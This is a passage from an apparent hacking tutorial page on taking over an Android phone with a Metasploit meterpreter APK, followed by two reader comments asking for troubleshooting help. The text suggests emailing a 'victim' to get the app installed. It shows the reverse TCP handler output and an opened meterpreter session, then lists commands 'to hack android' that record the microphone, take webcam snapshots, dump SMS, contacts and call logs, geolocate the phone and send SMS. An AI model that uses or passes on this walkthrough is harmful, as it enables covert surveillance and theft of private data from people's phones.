In real scenario you can write E-mail to victim to download the app and installation. In our case we are uploading the apk on vm and installing it.
Once installed and open the app “Main Activity”.
Upon opening the app we will get the meterpreter session on our kali linux as below:
msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.202.128:4444 [*] Starting the payload handler... [*] Sending stage (63194 bytes) to 192.168.202.129 [*] Meterpreter session 1 opened (192.168.202.128:4444 -> 192.168.202.129:48620) at 2017-04-05 21:37:50 +0000 meterpreter >
Just type sysinfo command at the meterpreter prompt to get the details about the phone.
meterpreter > sysinfo Computer : localhost OS : Android 4.3 - Linux 3.10.2-android-x86+ (i686) Meterpreter : java/android meterpreter >
You can use below list of commands to hack android. Description is self explanatory. Also you can use help command at the meterpreter prompt for details about it.
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Android Commands
================
Command Description
------- -----------
activity_start Start an Android activity from a Uri string
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
interval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
set_audio_mode Set Ringer Mode
sqlite_query Query a SQLite database from storage
wlan_geolocate Get current lat-long using WLAN information
Pages: 1 2
the session just ends after less than 10 seconds , how can i solve this issue
how to install jarsigner in kali linux lite